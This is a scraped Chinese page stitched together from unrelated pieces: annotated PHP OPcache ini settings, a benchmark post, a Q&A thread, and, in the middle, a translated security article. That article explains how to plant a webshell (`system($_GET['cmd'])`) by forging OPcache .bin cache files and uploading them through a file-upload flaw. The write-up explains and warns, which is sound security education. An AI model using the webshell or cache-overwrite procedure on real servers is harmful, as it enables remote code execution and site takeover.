5172人阅读
zend_extension = &G:/PHP/php-5.5.6-Win32-VC11-x64/ext/php_opcache.dll&
; Zend Optimizer + 的开关, 关闭时代码不再优化.
opcache.enable=1
; Determines if Zend OPCache is enabled for the CLI version of PHP
opcache.enable_cli=1
; Zend Optimizer + 共享内存的大小, 总共能够存储多少预编译的 PHP 代码(单位:MB)
; 推荐 128
opcache.memory_consumption=64
; Zend Optimizer + 暂存池中字符串的占内存总量.(单位:MB)
opcache.interned_strings_buffer=4
; 最大缓存的文件数目 200
到 100000 之间
; 推荐 4000
opcache.max_accelerated_files=2000
; 内存“浪费”达到此值对应的百分比,就会发起一个重启调度.
opcache.max_wasted_percentage=5
; 开启这条指令, Zend Optimizer + 会自动将当前工作目录的名字追加到脚本键上,
; 以此消除同名文件间的键值命名冲突.关闭这条指令会提升性能,
; 但是会对已存在的应用造成破坏.
opcache.use_cwd=0
; 开启文件时间戳验证
opcache.validate_timestamps=1
; 2s检查一次文件更新 注意:0是一直检查不是关闭
opcache.revalidate_freq=2
; 允许或禁止在 include_path 中进行文件搜索的优化
;opcache.revalidate_path=0
; 是否保存文件/函数的注释
如果apigen、Doctrine、 ZF2、 PHPUnit需要文件注释
opcache.save_comments=1
; 是否加载文件/函数的注释
;opcache.load_comments=1
; 打开快速关闭, 打开这个在PHP Request Shutdown的时候会收内存的速度会提高
opcache.fast_shutdown=1
;允许覆盖文件存在（file_exists等）的优化特性。
;opcache.enable_file_override=0
; 定义启动多少个优化过程
;opcache.optimization_level=0xffffffff
; 启用此Hack可以暂时性的解决”can’t redeclare class”错误.
;opcache.inherited_hack=1
; 启用此Hack可以暂时性的解决”can’t redeclare class”错误.
;opcache.dups_fix=0
; 设置不缓存的黑名单
; 不缓存指定目录下cache_开头的PHP文件. /png//public_html/cache/cache_
;opcache.blacklist_filename=
; 通过文件大小屏除大文件的缓存.默认情况下所有的文件都会被缓存.
;opcache.max_file_size=0
; 每 N 次请求检查一次缓存校验.默认值0表示检查被禁用了.
; 由于计算校验值有损性能,这个指令应当紧紧在开发调试的时候开启.
;opcache.consistency_checks=0
; 从缓存不被访问后,等待多久后(单位为秒)调度重启
;opcache.force_restart_timeout=180
; 错误日志文件名.留空表示使用标准错误输出(stderr).
;opcache.error_log=
; 将错误信息写入到服务器(Apache等)日志
;opcache.log_verbosity_level=1
; 内存共享的首选后台.留空则是让系统选择.
;opcache.preferred_memory_model=
; 防止共享内存在脚本执行期间被意外写入, 仅用于内部调试.
;opcache.protect_memory=0
&&相关文章推荐
* 以上用户言论只代表其个人观点，不代表CSDN网站的观点或立场
访问：200936次
积分：2294
积分：2294
排名：第16290名
原创：34篇
转载：76篇
评论：14条
(1)(5)(3)(9)(4)(1)(2)(3)(1)(1)(3)(4)(6)(5)(3)(16)(1)(3)(1)(1)(3)(5)(9)(2)(4)(9)(4)(2)当前位置： && 知识详情
利用PHP 7中的OPcache来实现Webshell
阅读：24424次
在这篇文章中,我们将会对PHP7 OPcache引擎中的安全问题进行讲解,而且还会给大家介绍一种新型的漏洞利用技术。通过这种攻击方法,我们可以绕过某些安全强化技术,例如等安全保障措施。除此之外,攻击者还可以利用这种攻击技术在目标主机中执行恶意代码。OPcahceOPcache是PHP 7.0中内嵌的新型缓存引擎。它可以对PHP脚本代码进行编译,并且将编译结果以字节码的形势存入内存中。OPcache 通过将 PHP 脚本预编译的字节码存储到共享内存中来提升 PHP 的性能, 存储预编译字节码的好处就是省去了每次加载和解析 PHP 脚本的开销。除此之外,它还能提供文件系统的缓存功能,但是我们必须在PHP.ini配置文件中定义缓存信息的目标文件夹路径:opcache.file_cache=/tmp/opcache在上面这个文件夹中,OPcache会将编译好的PHP脚本保存在相应PHP脚本的相同目录结构之中。比如说,需要进行编译的代码保存在/var/www/index.php之中,而完成编译的代码将会保存在/tmp/opcache/[system_id]/var/www/index.php.bin之中。在上述文件路径中,system_id是一个包含了当前PHP版本信息,Zend框架的扩展ID,以及各种数据类型信息的MD5 哈希值。在最新发行版的Ubuntu操作系统(16.04)之中,system_id是由当前Zend框架和PHP的版本号所组成的(81d80d78c6ef96b89afaadc7ffc5d7ea)。当OPcache首次对这些文件进行缓存处理时,会在文件系统中创建相应的目录。正如我们将会在接下来的章节中看到的,每一个OPcache文件还会在文件的header域中保存system_id的副本。至此,我们就不得不提到OPcache文件夹了,其中一个非常有趣的地方就是,当用户启用了这项服务之后,用户就会拥有OPcache生成的所有文件夹或者文件(所有文件和文件夹均位于/tmp/opcache/目录之下)的写入权限。OPcache文件夹中的权限信息如下所示:$ ls /tmp/opcache/drwx------ 4 www-data www-data 4096 Apr 26 09:16 81d80d78c6ef96b89afaadc7ffc5d7ea正如我们看到的那样,www-data分组下的用户都拥有OPcache所生成文件夹的写入权限。如果我们拥有OPcache目录的写入权限,那么我们就可以重写目录中的缓存文件,然后利用webshell来执行任意代码。攻击场景首先,我们必须得到缓存文件夹的保存路径(/tmp/opcache/[system_id]),以及目标PHP文件的保存路径(/var/www/...)。为了让大家更容易理解,我们假设网站目录中存在一个phpinfo()文件,我们可以从这个文件中获取到缓存文件夹和文件源代码的存储位置,当我们在计算system_id的时候将会需要用到这些数据。我们已经开发出了一款能够从网站phpinfo()中提取信息,并计算system_id的工具。你可以在我们的中获取到这个工具。在此,我们需要注意的是,目标网站必须不能对上传的文件有所限制。现在,我们假设php.ini中除了默认的设置信息之外,还添加有下列配置数据:opcache.validate_timestamp = 0&&& ; PHP 7's default is 1opcache.file_cache_only = 1&&&&&& ; PHP 7's default is 0opcache.file_cache = /tmp/opcache接下来,我们就会给大家讲解攻击的实施过程:我们已经在网站中找到了一个漏洞,这个漏洞意味着网站不会对我们上传的文件进行任何的限制。我们的目标就是利用包含后门的恶意代码替换掉文件/tmp/opcache/[system_id]/var/www/index.php.bin。上图显示的就是包含漏洞的网站界面。1.在本地创建一个包含Webshell的恶意PHP文件,将其命名为“index.php”:&?php&& system($_GET['cmd']);?&2.将opcache.file_cache的相关设置添加进你的PHP.ini文件之中。3.利用php –S 127.0.0.1:8080命令启动一个Web服务器,然后向服务器请求index.php文件,并触发缓存引擎。在这一步中,我们只需要使用命令wget 127.0.0.1:8080就可以实现我们的目的了。4.定位到我们在第一步中设置的缓存文件夹,你将会发现了一个名为index.php.bin的文件。这个文件就是已经经过编译处理的webshell。上图显示的是OPcache生成的index.php.bin。5.由于本地system_id很可能与目标主机的system_id不同,所以我们必须打开index.php.bin文件,并将我们的system_id修改成目标主机的system_id。正如我们之前所提到的,system_id是有可能被猜到的,例如暴力破解,或者根据phpinfo()文件中的服务器信息计算出来。我们可以在文件签名数据之后修改system_id,具体如下图所示:上图显示的是system_id的数据存储位置。6.由于目标网站对上传的文件没有任何的限制,所以我们现在就将文件上传至服务器的目录之中:/tmp/opcache/[system_id]/var/www/index.php.bin7.刷新网站的index.php,网站将会自动执行我们的webshell。绕过内存缓存(file_cache_only = 0)如果内存缓存的优先级高于文件缓存,那么重写OPcache文件并不会执行我们的webshell。如果服务器托管的网站中存在文件上传限制漏洞,那么在服务器重启之后,我们就可以绕过这种限制。既然内存缓存可以被清空,OPcache将会使用文件缓存来填充内存缓存,从而达到我们执行webshell的目的。这也就意味着,我们还是有办法能够在服务器不进行重启的情况下,执行我们的webshell。在WordPress等网站框架之中,还是会有一些过时的文件可以公开访问到,例如。由于这些文件已经过时了,所以系统不会再加载这些文件,这也就意味着,内存和文件系统的缓存中是不可能存在有这些文件的。当我们上传了恶意代码(registration-functions.php.bin)之后,然后访问相关的网页(/wp-includes/registration-functions.php),OPcache就会自动执行我们的webshell。绕过时间戳认证(validate_timestamps = 1)时间戳通常是一个字符序列,它可以唯一地标识某一时刻的时间。一般来说,时间戳产生的过程为:用户首先将需要加时间戳的文件用Hash编码加密形成摘要,然后将该摘要发送到DTS,DTS在加入了收到文件摘要的日期和时间信息后再对该文件加密(数字签名),然后送回用户。如果服务器启用了时间戳认证功能,OPcache将会对被请求的PHP源文件的时间戳进行验证,如果该文件与缓存文件header域中的时间戳相匹配,那么服务器就会允许访问。如果时间戳不匹配,那么缓存文件将会被丢弃,并创建出一个新的缓存文件。为了绕过这种限制,攻击者必须知道目标源文件的时间戳。这也就意味着,在WordPress等网站框架之中,源文件的时间戳是可以获取到的,因为当开发人员将代码文件从压缩包中解压出来之后,时间戳信息仍然是保持不变的。上图显示的是WordPress/wp-includes文件夹中的信息。有趣的是,其中的有些文件从2012年起就再也没有进行过任何的修改(请注意以下两个文件:registration-functions.php和registration.php)。因此,即使是不同版本的WordPress,这些相同文件的时间戳也是一样的。在获取到了文件时间戳的信息之后,攻击者就可以修改他们的恶意代码,并且成功覆盖服务器的缓存数据。时间戳信息位于文件开头处的第34字节位置:演示视频在此,我们给大家提供了一个简短的演示视频,并在视频中对攻击步骤进行了讲解:视频地址:https://youtu.be/x42l-PQHhbA正如我们在此之前提到的,大家可以在我们的中获取到你们所需要的工具。总结总而言之,这种新型的攻击方法并不会对使用PHP进行开发的应用程序产生影响,因为这并不是PHP的通用漏洞。现在,很多Linux发行版的操作系统(例如Ubuntu 16.04)都会默认安装PHP 7,所以当我们在了解到了这种攻击技术之后,在我们的开发过程中,更加因该谨慎地审查我们的代码,并检查网站中是否存在文件上传限制漏洞,因为这个漏洞将会对服务器的安全产生影响。
本文由 安全客 翻译，转载请注明“转自安全客”，并附上链接。
参与讨论，请先
安全播报APP
Copyright & 360网络攻防实验室 All Rights Reserved 京ICP证080047号[京ICP备号-6]本文讲的是opcache PHP新的字节码缓存扩展详解，
字节码缓存组件 Zend Optimizer+ 现在更改名字为 Zend opcache了。且在php 5.5版本后，会集成到php的官方组件中，也就没有必要安装其他的APC,eAccelerator等了。。
APC与Opcach
字节码缓存组件 Zend Optimizer+ 现在更改名字为 Zend opcache了。且在php 5.5版本后，会集成到php的官方组件中，也就没有必要安装其他的APC,eAccelerator等了。。
APC与Opcache都是字节码缓存也就是，PHP在被编译的时候，首先会把php代码转换为字节码，字节码然后被执行。
php文件第二次执行时，同样还是会重新转换为字节码，但是很多时候，文件内容几乎是一样的，比如静态HTML文件，生成后内容许久都不会改变，用户访问请求直接由服务器读取响应给客户端浏览器。都不用经过PHP进行解析构建了。
内存中的字节码数据，可以直接缓存进行二次编译。这样程序就会快一些，cpu的消耗也少了。
详细介绍看这两篇
新一代 PHP 加速插件 Zend Opcache
php的 zend opcache VS apc 性能比较
我主要是用来测试了一下phpcmsV9.5.4 的默认index.php主页，没有数据内容，但有sql查询操作
测试是Apache2.2.6 32Bit 服务器，PHP 5.4.26 ts，mysql 5.6.16 64Bit
ab 版本 This is ApacheBench, Version 2.3 &$Revision: 655654 $&
请求数：1000
并发数：10
没有加载opcache测试
第一次测试
吞吐率 38.46 rps，耗时26.001 s，每个请求耗时260.015 ms
第二次测试
吞吐率有所提高 40.73 rps，耗时 24.554 s，每个请求耗时245.544 ms
加载opcache进行测试
opcache版本 php_opcache-7.0.3-5.4-ts-vc9-x86
opcache配置信息
opcache.memory_consumption=128
opcache.interned_strings_buffer=8
opcache.max_accelerated_files=4000
opcache.revalidate_freq=60
opcache.fast_shutdown=1
opcache.enable_cli=1
第一次配置opcache好后 cache 状态
cache hits 命中数 1
cache misses 未命中数 1
使用内存225.2Kb
opcache第一次测试
吞吐率提升到49.11rps，总耗时20.361 s，每个请求耗时下降到203.612 ms
在phpinfo中可查看opcache的命中数量情况
命中数量已达到43957，内存使用2.31Mb。
opcache第二次测试
吞吐率提升到47.87rps，总耗时20.888 s，每个请求耗时下降到208.882 ms
opcache之后的两次压测数据变化不大，每个请求耗时在1ms差距内，吞吐率也在1~2 rps
但与之前未启用opcache时，总耗时少了4 ~ 6 s，每个请求耗时少了40 ~ 60 ms。吞吐率也提升了 8%。
这都是在一行代码未改的情况下有效性能提升。
php文件被编译为字节码进行内存缓存，如果在生成环境中，代码和内容变量都是比较固定的
缓存起来的内容就可以高速的返回，用户会得到较快的响应。
但是在本地开发是，建议不要开启opcache，否则就得不到最新的值
header('Content-type:text/ charset=utf-8');
$str = 'abc';
echo $ // 输出abc
赋予$str 一个新的值
header('Content-type:text/ charset=utf-8');
$str = 'new abc';
echo $ // 输出的还是 abc
这是因为$str 已经被编译为字节码了，再次访问时，内存里面还是可以找到对应的缓存，就没有进行重新编译，返回的值也就还是之前的值 abc
不过，opcache有一个参数可以用来设置缓存时间长度
opcache.force_restart_timeout (default "180")
默认时间为180秒，还是建议本地不用开启opcache
注意：官方给了一个Note，如果opcache要与xdebug同时加载，那么opcache需要在xdebug之前进行加载。
但是我本地测试了一下，xdebug先加载，再加载opcache，也正常启动了，xdebug，opcache都加载成功，opcache缓存也正常。
不过还是按照官方的建议来安装加载，否则可能会出现奇怪的错误吧
以上是云栖社区小编为您精心准备的的内容，在云栖社区的博客、问答、公众号、人物、课程等栏目也有的相关内容，欢迎继续使用右上角搜索按钮进行搜索内存
opcache 缓存清除、php opcache 清除缓存、opcache缓存、php opcache 禁用缓存、opcache 参数详解，以便于您获取更多的相关知识。
弹性可伸缩的计算服务，助您降低 IT 成本，提升运维效率
稳定可靠、可弹性伸缩的在线数据库服务，全球最受欢迎的开源数据库之一
6款热门基础云产品6个月免费体验；2款产品1年体验;1款产品2年体验
开发者常用软件，超百款实用软件一站式提供
云栖社区()为您免费提供相关信息，包括
的信息，还有opcache 缓存清除、php opcache 清除缓存、opcache缓存、php opcache 禁用缓存、opcache 参数详解等
，所有相关内容均不代表云栖社区的意见！问题对人有帮助，内容完整，我也想知道答案
问题没有实际价值，缺少关键内容，没有改进余地
新版本的php中已经用opcache替换掉了apc，但不是完整的移植，起码以前apc中方便好用的数据缓存功能就没有实现，而我因为存储的是配置信息，又不想从远程获取。
现在PHP是否有靠谱的本地缓存方案？
答案对人有帮助，有参考价值
答案没帮助，是错误的答案，答非所问
除了推荐像Redis这样的缓存方案以外，还推荐看看laruence的
答案对人有帮助，有参考价值
答案没帮助，是错误的答案，答非所问
不能，推荐 Redis
答案对人有帮助，有参考价值
答案没帮助，是错误的答案，答非所问
你需要XCache
答案对人有帮助，有参考价值
答案没帮助，是错误的答案，答非所问
答案对人有帮助，有参考价值
答案没帮助，是错误的答案，答非所问
利用共享内存实现可以?
同步到新浪微博
分享到微博？
Hi，欢迎来到 SegmentFault 技术社区！⊙▽⊙ 在这里，你可以提出编程相关的疑惑，关注感兴趣的问题，对认可的回答投赞同票；大家会帮你解决编程的问题，和你探讨技术更新，为你的回答投上赞同票。
明天提醒我
关闭理由：
删除理由：
忽略理由：
推广（招聘、广告、SEO 等）方面的内容
与已有问题重复（请编辑该提问指向已有相同问题）
答非所问，不符合答题要求
宜作评论而非答案
带有人身攻击、辱骂、仇恨等违反条款的内容
无法获得确切结果的问题
非开发直接相关的问题
非技术提问的讨论型问题
其他原因（请补充说明）
我要该，理由是：}